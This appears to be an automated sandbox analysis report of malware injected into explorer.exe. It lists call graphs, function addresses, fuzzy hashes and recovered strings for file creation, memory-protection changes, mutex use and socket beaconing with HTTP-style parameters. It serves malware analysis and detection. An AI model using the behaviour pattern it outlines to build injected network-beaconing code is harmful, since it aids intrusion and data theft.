fe90438 13630->13543 13632 fe9025e 13631->13632 13635 fe8f8c2 13632->13635 13634 fe9026b 13634->13630 13636 fe8f934 13635->13636 13637 fe8f995 ObtainUserAgentString 13636->13637 13638 fe8f9a6 13636->13638 13637->13638 13638->13634 13953 fe8a42e 13954 fe8a45b 13953->13954 13962 fe8a4c9 13953->13962 13955 fe94232 NtCreateFile 13954->13955 13954->13962 13956 fe8a496 13955->13956 13957 fe8a4c5 13956->13957 13959 fe8a082 NtCreateFile 13956->13959 13958 fe94232 NtCreateFile 13957->13958 13957->13962 13958->13962 13960 fe8a4b6 13959->13960 13960->13957 13961 fe89f52 NtCreateFile 13960->13961 13961->13957 13850 fe9172e 13851 fe91788 connect 13850->13851 13852 fe9176a 13850->13852 13852->13851 13853 fe8ece2 13855 fe8edd9 13853->13855 13854 fe8f022 13855->13854 13859 fe8e352 13855->13859 13857 fe8ef0d 13857->13854 13868 fe8e792 13857->13868 13860 fe8e39e 13859->13860 13861 fe8e58e 13860->13861 13862 fe8e4ec 13860->13862 13864 fe8e595 13860->13864 13861->13857 13863 fe94232 NtCreateFile 13862->13863 13866 fe8e4ff 13863->13866 13864->13861 13865 fe94232 NtCreateFile 13864->13865 13865->13861 13866->13861 13867 fe94232 NtCreateFile 13866->13867 13867->13861 13869 fe8e7e0 13868->13869 13870 fe94232 NtCreateFile 13869->13870 13872 fe8e90c 13870->13872 13871 fe8eaf3 13871->13857 13872->13871 13873 fe8e352 NtCreateFile 13872->13873 13874 fe8e602 NtCreateFile 13872->13874 13873->13872 13874->13872 13875 fe912e4 13876 fe9136f 13875->13876 13877 fe91305 13875->13877 13877->13876 13878 fe910c2 6 API calls 13877->13878 13878->13876 13814 fe8bb66 13815 fe8bb6a 13814->13815 13816 fe8bcb5 CreateMutexExW 13815->13816 13817 fe8bcce 13815->13817 13816->13817 13933 fe910b9 13934 fe911f0 13933->13934 13935 fe910ed 13933->13935 13935->13934 13936 fe94f82 6 API calls 13935->13936 13936->13934 13818 fe94f7a 13820 fe94fb8 13818->13820 13819 fe95022 13820->13819 13821 fe915b2 socket 13820->13821 13822 fe95081 13820->13822 13821->13822 13822->13819 13823 fe95134 13822->13823 13825 fe95117 getaddrinfo 13822->13825 13823->13819 13824 fe91732 connect 13823->13824 13829 fe951b2 13823->13829 13824->13829 13825->13823 13826 fe916b2 send 13828 fe95729 13826->13828 13827 fe957f4 setsockopt recv 13827->13819 13828->13819 13828->13827 13829->13819 13829->13826 13879 fe8d0fb 13881 fe8d137 13879->13881 13880 fe8d2d5 13881->13880 13882 fe898f2 NtProtectVirtualMemory 13881->13882 13883 fe8d28a 13882->13883 13884 fe898f2 NtProtectVirtualMemory 13883->13884 13887 fe8d2a9 13884->13887 13885 fe8d2cd 13886 fe90382 ObtainUserAgentString 13885->13886 13886->13880 13887->13885 13888 fe898f2 NtProtectVirtualMemory 13887->13888 13888->13885 13963 fe9383a 13964 fe93841 13963->13964 13965 fe94f82 6 API calls 13964->13965 13967 fe938c5 13965->13967 13966 fe93906 13967->13966 13968 fe94232 NtCreateFile 13967->13968 13968->13966 13937 fe8f8be 13939 fe8f8c3 13937->13939 13938 fe8f9a6 13939->13938 13940 fe8f995 ObtainUserAgentString 13939->13940 13940->13938 13789 fe8cfbf 13791 fe8d016 13789->13791 13790 fe8d0f0 13791->13790 13794 fe898f2 NtProtectVirtualMemory 13791->13794 13795 fe8d0bb 13791->13795 13792 fe8d0e8 13793 fe90382 ObtainUserAgentString 13792->13793 13793->13790 13794->13795 13795->13792 13796 fe898f2 NtProtectVirtualMemory 13795->13796 13796->13792 13754 fe969f1 13755 fe969f7 13754->13755 13758 fe8b852 13755->13758 13757 fe96a0f 13759 fe8b8e4 13758->13759 13760 fe8b865 13758->13760 13759->13757 13760->13759 13762 fe8b887 13760->13762 13764 fe8b87e 13760->13764 13761 fe9136f 13761->13757 13762->13759 13766 fe8f662 13762->13766 13764->13761 13777 fe910c2 13764->13777 13767 fe8f66b 13766->13767 13773 fe8f7ba 13766->13773 13768 fe890f2 6 API calls 13767->13768 13767->13773 13770 fe8f6ee 13768->13770 13769 fe8f750 13772 fe8f83f 13769->13772 13769->13773 13775 fe8f791 13769->13775 13770->13769 13771 fe94f82 6 API calls 13770->13771 13771->13769 13772->13773 13774 fe94f82 6 API calls 13772->13774 13773->13759 13774->13773 13775->13773 13776 fe94f82 6 API calls 13775->13776 13776->13773 13778 fe911f0 13777->13778 13779 fe910cb 13777->13779 13778->13761 13779->13778 13780 fe94f82 6 API calls 13779->13780 13780->13778 13781 fe8a5f1 13782 fe8a60e 13781->13782 13783 fe8a606 13781->13783 13784 fe8f662 6 API calls 13783->13784 13784->13782 13889 fe890f1 13890 fe89109 13889->13890 13894 fe891d3 13889->13894 13891 fe89012 6 API calls 13890->13891 13892 fe89113 13891->13892 13893 fe94f82 6 API calls 13892->13893 13892->13894 13893->13894 13797 fe969b3 13798 fe969bd 13797->13798 13801 fe8b6d2 13798->13801 13800 fe969e0 13802 fe8b704 13801->13802 13803 fe8b6f7 13801->13803 13805 fe8b72d 13802->13805 13807 fe8b737 13802->13807 13809 fe8b6ff 13802->13809 13804 fe890f2 6 API calls 13803->13804 13804->13809 13810 fe912c2 13805->13810 13808 fe94f82 6 API calls 13807->13808 13807->13809 13808->13809 13809->13800 13811 fe912cb 13810->13811 13812 fe912df 13810->13812 13811->13812 13813 fe910c2 6 API calls 13811->13813 13812->13809 13813->13812 13746 fe94232 13748 fe9425c 13746->13748 13749 fe94334 13746->13749 13747 fe94410 NtCreateFile 13747->13749 13748->13747 13748->13749 13895 fe8d2f4 13896 fe8d349 13895->13896 13897 fe8d49f 13896->13897 13899 fe898f2 NtProtectVirtualMemory 13896->13899 13898 fe898f2 NtProtectVirtualMemory 13897->13898 13902 fe8d4c3 13897->13902 13898->13902 13900 fe8d480 13899->13900 13901 fe898f2 NtProtectVirtualMemory 13900->13901 13901->13897 13903 fe898f2 NtProtectVirtualMemory 13902->13903 13904 fe8d597 13902->13904 13903->13904 13905 fe898f2 NtProtectVirtualMemory 13904->13905 13907 fe8d5bf 13904->13907 13905->13907 13906 fe8d6e1 13908 fe90382 ObtainUserAgentString 13906->13908 13909 fe898f2 NtProtectVirtualMemory 13907->13909 13910 fe8d6b9 13907->13910 13911 fe8d6e9 13908->13911 13909->13910 13910->13906 13912 fe898f2 NtProtectVirtualMemory 13910->13912 13912->13906 13834 fe8e14a 13835 fe8e153 13834->13835 13840 fe8e174 13834->13840 13837 fe90382 ObtainUserAgentString 13835->13837 13836 fe8e1e7 13838 fe8e16c 13837->13838 13839 fe890f2 6 API calls 13838->13839 13839->13840 13840->13836 13842 fe891f2 13840->13842 13843 fe8920f 13842->13843 13846 fe892c9 13842->13846 13844 fe93f12 7 API calls 13843->13844 13845 fe89242 13843->13845 13844->13845 13847 fe8a432 NtCreateFile 13845->13847 13849 fe89289 13845->13849 13846->13840 13847->13849 13848 fe890f2 6 API calls 13848->13846 13849->13846 13849->13848 13969 fe95e0a 13970 fe94942 13969->13970 13971 fe95e45 NtProtectVirtualMemory 13970->13971 13972 fe95e70 13971->13972 13941 fe96a4d 13942 fe96a53 13941->13942 13945 fe8a782 13942->13945 13944 fe96a6b 13947 fe8a78f 13945->13947 13946 fe8a7ad 13946->13944 13947->13946 13948 fe8f662 6 API calls 13947->13948 13948->13946 13734 fe94f82 13735 fe94fb8 13734->13735 13736 fe915b2 socket 13735->13736 13737 fe95081 13735->13737 13742 fe95022 13735->13742 13736->13737 13738 fe95134 13737->13738 13740 fe95117 getaddrinfo 13737->13740 13737->13742 13739 fe91732 connect 13738->13739 13741 fe951b2 13738->13741 13738->13742 13739->13741 13740->13738 13741->13742 13743 fe916b2 send 13741->13743 13745 fe95729 13743->13745 13744 fe957f4 setsockopt recv 13744->13742 13745->13742 13745->13744 13785 fe8cdd9 13787 fe8cdf0 13785->13787 13786 fe8cecd 13787->13786 13788 fe90382 ObtainUserAgentString 13787->13788 13788->13786 13639 fe892dd 13643 fe8931a 13639->13643 13640 fe893fa 13641 fe89328 SleepEx 13641->13641 13641->13643 13643->13640 13643->13641 13646 fe93f12 13643->13646 13655 fe8a432 13643->13655 13665 fe890f2 13643->13665 13654 fe93f48 13646->13654 13647 fe94134 13647->13643 13648 fe940e9 13649 fe94125 13648->13649 13683 fe93842 13648->13683 13691 fe93922 13649->13691 13653 fe94232 NtCreateFile 13653->13654 13654->13647 13654->13648 13654->13653 13671 fe94f82 13654->13671 13656 fe8a45b 13655->13656 13664 fe8a4c9 13655->13664 13657 fe94232 NtCreateFile 13656->13657 13656->13664 13658 fe8a496 13657->13658 13663 fe8a4c5 13658->13663 13712 fe8a082 13658->13712 13659 fe94232 NtCreateFile 13659->13664 13661 fe8a4b6 13661->13663 13721 fe89f52 13661->13721 13663->13659 13663->13664 13664->13643 13666 fe89109 13665->13666 13670 fe891d3 13665->13670 13726 fe89012 13666->13726 13668 fe89113 13669 fe94f82 6 API calls 13668->13669 13668->13670 13669->13670 13670->13643 13672 fe94fb8 13671->13672 13674 fe95081 13672->13674 13679 fe95022 13672->13679 13699 fe915b2 13672->13699 13675 fe95134 13674->13675 13677 fe95117 getaddrinfo 13674->13677 13674->13679 13678 fe951b2 13675->13678 13675->13679 13702 fe91732 13675->13702 13677->13675 13678->13679 13705 fe916b2 13678->13705 13679->13654 13681 fe957f4 setsockopt recv 13681->13679 13682 fe95729 13682->13679 13682->13681 13684 fe9386d 13683->13684 13708 fe94232 13684->13708 13686 fe93906 13686->13648 13687 fe93888 13687->13686 13688 fe94f82 6 API calls 13687->13688 13689 fe938c5 13687->13689 13688->13689 13689->13686 13690 fe94232 NtCreateFile 13689->13690 13690->13686 13692 fe939c2 13691->13692 13693 fe94232 NtCreateFile 13692->13693 13694 fe939d6 13693->13694 13695 fe93a9f 13694->13695 13697 fe94f82 6 API calls 13694->13697 13698 fe93a5d 13694->13698 13695->13647 13696 fe94232 NtCreateFile 13696->13695 13697->13698 13698->13695 13698->13696 13700 fe9160a socket 13699->13700 13701 fe915ec 13699->13701 13700->13674 13701->13700 13703 fe91788 connect 13702->13703 13704 fe9176a 13702->13704 13703->13678 13704->13703 13706 fe91705 send 13705->13706 13707 fe916e7 13705->13707 13706->13682 13707->13706 13710 fe9425c 13708->13710 13711 fe94334 13708->13711 13709 fe94410 NtCreateFile 13709->13711 13710->13709 13710->13711 13711->13687 13713 fe8a420 13712->13713 13714 fe8a0aa 13712->13714 13713->13661 13714->13713 13715 fe94232 NtCreateFile 13714->13715 13717 fe8a1f9 13715->13717 13716 fe8a3df 13716->13661 13717->13716 13718 fe94232 NtCreateFile 13717->13718 13719 fe8a3c9 13718->13719 13720 fe94232 NtCreateFile 13719->13720 13720->13716 13722 fe89f70 13721->13722 13723 fe89f84 13721->13723 13722->13663 13724 fe94232 NtCreateFile 13723->13724 13725 fe8a046 13724->13725 13725->13663 13728 fe89031 13726->13728 13727 fe890cd 13727->13668 13728->13727 13729 fe94f82 6 API calls 13728->13729 13729->13727 13913 fe8cedd 13914 fe8cf06 13913->13914 13915 fe8cfa4 13914->13915 13916 fe898f2 NtProtectVirtualMemory 13914->13916 13917 fe8cf9c 13916->13917 13918 fe90382 ObtainUserAgentString 13917->13918 13918->13915 13973 fe96a1f 13974 fe96a25 13973->13974 13977 fe8a5f2 13974->13977 13976 fe96a3d 13978 fe8a5fb 13977->13978 13979 fe8a60e 13977->13979 13978->13979 13980 fe8f662 6 API calls 13978->13980 13979->13976 13980->13979 13750 fe95e12 13751 fe95e45 NtProtectVirtualMemory 13750->13751 13752 fe94942 13750->13752 13753 fe95e70 13751->13753 13752->13751 13981 fe8a613 13983 fe8a620 13981->13983 13982 fe8a67e 13983->13982 13984 fe95e12 NtProtectVirtualMemory 13983->13984 13984->13983 13919 fe8ecd4 13921 fe8ecd8 13919->13921 13920 fe8f022 13921->13920 13922 fe8e352 NtCreateFile 13921->13922 13923 fe8ef0d 13922->13923 13923->13920 13924 fe8e792 NtCreateFile 13923->13924 13924->13923

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 0FE94F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 fe94f82-fe94fb6 1 fe94fb8-fe94fbc 0->1 2 fe94fd6-fe94fd9 0->2 1->2 3 fe94fbe-fe94fc2 1->3 4 fe94fdf-fe94fed 2->4 5 fe958fe-fe9590c 2->5 3->2 6 fe94fc4-fe94fc8 3->6 7 fe94ff3-fe94ff7 4->7 8 fe958f6-fe958f7 4->8 6->2 11 fe94fca-fe94fce 6->11 9 fe94ff9-fe94ffd 7->9 10 fe94fff-fe95000 7->10 8->5 9->10 12 fe9500a-fe95010 9->12 10->12 11->2 13 fe94fd0-fe94fd4 11->13 14 fe9503a-fe95060 12->14 15 fe95012-fe95020 12->15 13->2 13->4 17 fe95068-fe9507c call fe915b2 14->17 18 fe95062-fe95066 14->18 15->14 16 fe95022-fe95026 15->16 16->8 19 fe9502c-fe95035 16->19 22 fe95081-fe950a2 17->22 18->17 20 fe950a8-fe950ab 18->20 19->8 23 fe950b1-fe950b8 20->23 24 fe95144-fe95150 20->24 22->20 25 fe958ee-fe958ef 22->25 27 fe950ba-fe950dc call fe94942 23->27 28 fe950e2-fe950f5 23->28 24->25 26 fe95156-fe95165 24->26 25->8 30 fe9517f-fe9518f 26->30 31 fe95167-fe95178 call fe91552 26->31 27->28 28->25 29 fe950fb-fe95101 28->29 29->25 33 fe95107-fe95109 29->33 35 fe95191-fe951ad call fe91732 30->35 36 fe951e5-fe9521b 30->36 31->30 33->25 40 fe9510f-fe95111 33->40 47 fe951b2-fe951da 35->47 38 fe9522d-fe95231 36->38 39 fe9521d-fe9522b 36->39 44 fe95233-fe95245 38->44 45 fe95247-fe9524b 38->45 43 fe9527f-fe95280 39->43 40->25 46 fe95117-fe95132 getaddrinfo 40->46 51 fe95283-fe952e0 call fe95d62 call fe92482 call fe91e72 call fe96002 43->51 44->43 48 fe9524d-fe9525f 45->48 49 fe95261-fe95265 45->49 46->24 50 fe95134-fe9513c 46->50 47->36 52 fe951dc-fe951e1 47->52 48->43 53 fe9526d-fe95279 49->53 54 fe95267-fe9526b 49->54 50->24 63 fe952e2-fe952e6 51->63 64 fe952f4-fe95354 call fe95d92 51->64 52->36 53->43 54->51 54->53 63->64 65 fe952e8-fe952ef call fe92042 63->65 69 fe9535a-fe95396 call fe95d62 call fe96262 call fe96002 64->69 70 fe9548c-fe954b8 call fe95d62 call fe96262 64->70 65->64 84 fe95398-fe953b7 call fe96262 call fe96002 69->84 85 fe953bb-fe953e9 call fe96262 * 2 69->85 79 fe954d9-fe95590 call fe96262 * 3 call fe96002 * 2 call fe92482 70->79 80 fe954ba-fe954d5 70->80 110 fe95595-fe955b9 call fe96262 79->110 80->79 84->85 101 fe953eb-fe95410 call fe96002 call fe96262 85->101 102 fe95415-fe9541d 85->102 101->102 105 fe9541f-fe95425 102->105 106 fe95442-fe95448 102->106 107 fe95467-fe95487 call fe96262 105->107 108 fe95427-fe9543d 105->108 109 fe9544e-fe95456 106->109 106->110 107->110 108->110 109->110 113 fe9545c-fe9545d 109->113 120 fe955bb-fe955cc call fe96262 call fe96002 110->120 121 fe955d1-fe956ad call fe96262 * 7 call fe96002 call fe95d62 call fe96002 call fe91e72 call fe92042 110->121 113->107 132 fe956af-fe956b3 120->132 121->132 135 fe956ff-fe9572d call fe916b2 132->135 136 fe956b5-fe956fa call fe91382 call fe917b2 132->136 144 fe9575d-fe95761 135->144 145 fe9572f-fe95735 135->145 153 fe958e6-fe958e7 136->153 149 fe9590d-fe95913 144->149 150 fe95767-fe9576b 144->150 145->144 148 fe95737-fe9574c 145->148 148->144 154 fe9574e-fe95754 148->154 155 fe95779-fe95784 149->155 156 fe95919-fe95920 149->156 157 fe958aa-fe958df call fe917b2 150->157 158 fe95771-fe95773 150->158 153->25 154->144 163 fe95756 154->163 159 fe95795-fe95796 155->159 160 fe95786-fe95793 155->160 156->160 157->153 158->155 158->157 164 fe9579c-fe957a0 159->164 160->159 160->164 163->144 167 fe957b1-fe957b2 164->167 168 fe957a2-fe957af 164->168 170 fe957b8-fe957c4 167->170 168->167 168->170 173 fe957f4-fe95861 setsockopt recv 170->173 174 fe957c6-fe957ef call fe95d92 call fe95d62 170->174 177 fe958a3-fe958a4 173->177 178 fe95863 173->178 174->173 177->157 178->177 181 fe95865-fe9586a 178->181 181->177 184 fe9586c-fe95872 181->184 184->177 186 fe95874-fe958a1 184->186 186->177 186->178
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                                                                      • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                                                                      • API String ID: 1564272048-1117930895
                                                                                                                                                                                                                      • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                                                      • Instruction ID: 3d2259028d3cbbeaecc0de3be09c5d8aa9ffc02d803d4a5879d77e5abbab6d8b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6527E30618B088BCB69EF68C4947E9B7E1FB94304F54562EC49FCB146DE34B54ACBA1
                                                                                                                                                                                                                      Function 0FE94232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 303 fe94232-fe94256 304 fe948bd-fe948cd 303->304 305 fe9425c-fe94260 303->305 305->304 306 fe94266-fe942a0 305->306 307 fe942bf 306->307 308 fe942a2-fe942a6 306->308 310 fe942c6 307->310 308->307 309 fe942a8-fe942ac 308->309 311 fe942ae-fe942b2 309->311 312 fe942b4-fe942b8 309->312 313 fe942cb-fe942cf 310->313 311->310 312->313 314 fe942ba-fe942bd 312->314 315 fe942f9-fe9430b 313->315 316 fe942d1-fe942f7 call fe94942 313->316 314->313 320 fe94378 315->320 321 fe9430d-fe94332 315->321 316->315 316->320 322 fe9437a-fe943a0 320->322 323 fe943a1-fe943a8 321->323 324 fe94334-fe9433b 321->324 325 fe943aa-fe943d3 call fe94942 323->325 326 fe943d5-fe943dc 323->326 327 fe9433d-fe94360 call fe94942 324->327 328 fe94366-fe94370 324->328 325->320 325->326 332 fe943de-fe9440a call fe94942 326->332 333 fe94410-fe94458 NtCreateFile call fe94172 326->333 327->328 328->320 330 fe94372-fe94373 328->330 330->320 332->320 332->333 338 fe9445d-fe9445f 333->338 338->320 340 fe94465-fe9446d 338->340 340->320 341 fe94473-fe94476 340->341 342 fe94478-fe94481 341->342 343 fe94486-fe9448d 341->343 342->322 344 fe9448f-fe944b8 call fe94942 343->344 345 fe944c2-fe944ec 343->345 344->320 350 fe944be-fe944bf 344->350 351 fe948ae-fe948b8 345->351 352 fe944f2-fe944f5 345->352 350->345 351->320 353 fe944fb-fe944fe 352->353 354 fe94604-fe94611 352->354 355 fe9455e-fe94561 353->355 356 fe94500-fe94507 353->356 354->322 361 fe94567-fe94572 355->361 362 fe94616-fe94619 355->362 358 fe94509-fe94532 call fe94942 356->358 359 fe94538-fe94559 356->359 358->320 358->359 366 fe945e9-fe945fa 359->366 367 fe945a3-fe945a6 361->367 368 fe94574-fe9459d call fe94942 361->368 364 fe946b8-fe946bb 362->364 365 fe9461f-fe94626 362->365 369 fe94739-fe9473c 364->369 370 fe946bd-fe946c4 364->370 372 fe94628-fe94651 call fe94942 365->372 373 fe94657-fe9466b call fe95e92 365->373 366->354 367->320 375 fe945ac-fe945b6 367->375 368->320 368->367 379 fe94742-fe94749 369->379 380 fe947c4-fe947c7 369->380 376 fe946f5-fe94734 370->376 377 fe946c6-fe946ef call fe94942 370->377 372->320 372->373 373->320 395 fe94671-fe946b3 373->395 375->320 383 fe945bc-fe945e6 375->383 399 fe94894-fe948a9 376->399 377->351 377->376 387 fe9474b-fe94774 call fe94942 379->387 388 fe9477a-fe947bf 379->388 380->320 384 fe947cd-fe947d4 380->384 383->366 390 fe947fc-fe94803 384->390 391 fe947d6-fe947f6 call fe94942 384->391 387->351 387->388 388->399 397 fe9482b-fe94835 390->397 398 fe94805-fe94825 call fe94942 390->398 391->390 395->322 397->351 404 fe94837-fe9483e 397->404 398->397 399->322 404->351 408 fe94840-fe94886 404->408 408->399
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID: `
                                                                                                                                                                                                                      • API String ID: 823142352-2679148245
                                                                                                                                                                                                                      • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                                                      • Instruction ID: 5fa5b1f2f884873b7c1070d7f293f964709167dae11ebbf484817473e7f258ee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC225C70A18B099FCB59DF28C4946AEF7E1FB98305F80522EE45ED7291DB30E552CB81
                                                                                                                                                                                                                      Function 0FE95E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 447 fe95e12-fe95e38 448 fe95e45-fe95e6e NtProtectVirtualMemory 447->448 449 fe95e40 call fe94942 447->449 450 fe95e7d-fe95e8f 448->450 451 fe95e70-fe95e7c 448->451 449->448
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 0FE95E67
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                                                                                                      • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                                                      • Instruction ID: dab135c3dd58b5e6c1a1718a13ec1ea8eb8af0f9ef68f6e1ede88f72bfd1b97e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F019E30628B884F8B88EF6CD48012AB7E4FBC9214F000B3EA99AC3250EB64C5414752
                                                                                                                                                                                                                      Function 0FE95E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 452 fe95e0a-fe95e6e call fe94942 NtProtectVirtualMemory 455 fe95e7d-fe95e8f 452->455 456 fe95e70-fe95e7c 452->456
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 0FE95E67
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                                                                                                      • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                                                      • Instruction ID: ac23aa467dcdac8d4c3af21ed3b1b5502a2a358510eb73fad6014de10aad3e38
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2301A23462CB884B8B48EB3C94412A6B3E5FBCE314F000B3EE99AC3251EB25D5024782
                                                                                                                                                                                                                      Function 0FE8F8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ObtainUserAgentString.URLMON ref: 0FE8F9A0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AgentObtainStringUser
                                                                                                                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                                      • API String ID: 2681117516-319646191
                                                                                                                                                                                                                      • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                                      • Instruction ID: 9d072e0b0c46b06b9c643cfc37de6443ce2472d2ab14e26704c70be540f71765
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6131FD31618B5C8BCF10EFA8C8887EEBBE1FB58204F40122AD44ED7241DE788645C799
                                                                                                                                                                                                                      Function 0FE8F8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ObtainUserAgentString.URLMON ref: 0FE8F9A0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AgentObtainStringUser
                                                                                                                                                                                                                      • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                                      • API String ID: 2681117516-319646191
                                                                                                                                                                                                                      • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                                      • Instruction ID: 7cd21e60f7f784b8dc17238f4b415c9c7dd1a214df49d48406c8f62342ddac8e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE21EE70A14B5C8ACF15EFA8C8847EEBBE1FF58204F40522AD45ED7251DE788605CB99
                                                                                                                                                                                                                      Function 0FE8BB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
